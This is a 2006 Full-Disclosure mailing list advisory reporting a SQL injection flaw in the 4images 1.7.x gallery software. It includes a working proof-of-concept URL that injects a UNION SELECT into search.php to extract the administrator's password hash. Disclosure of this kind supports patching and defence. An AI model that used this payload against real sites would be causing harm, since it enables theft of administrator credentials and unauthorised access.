[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] SQL injection - 4images
- To: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] SQL injection - 4images
- From: disfigure <disfigure@xxxxxxxxx>
- Date: Sun, 8 Oct 2006 16:20:08 -0500
/****************************************/
http://www.w4cking.com
Product:
4images 1.7.x
http://www.4homepages.de
Vulnerability:
SQL injection
Notes:
- SQL injection can be used to obtain password hash
- for version 1.7.3, you must log in as a registered user
POC:
<target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%20user_name=%2527ADMIN
Original advisory with exploit script (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1037
/****************************************/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/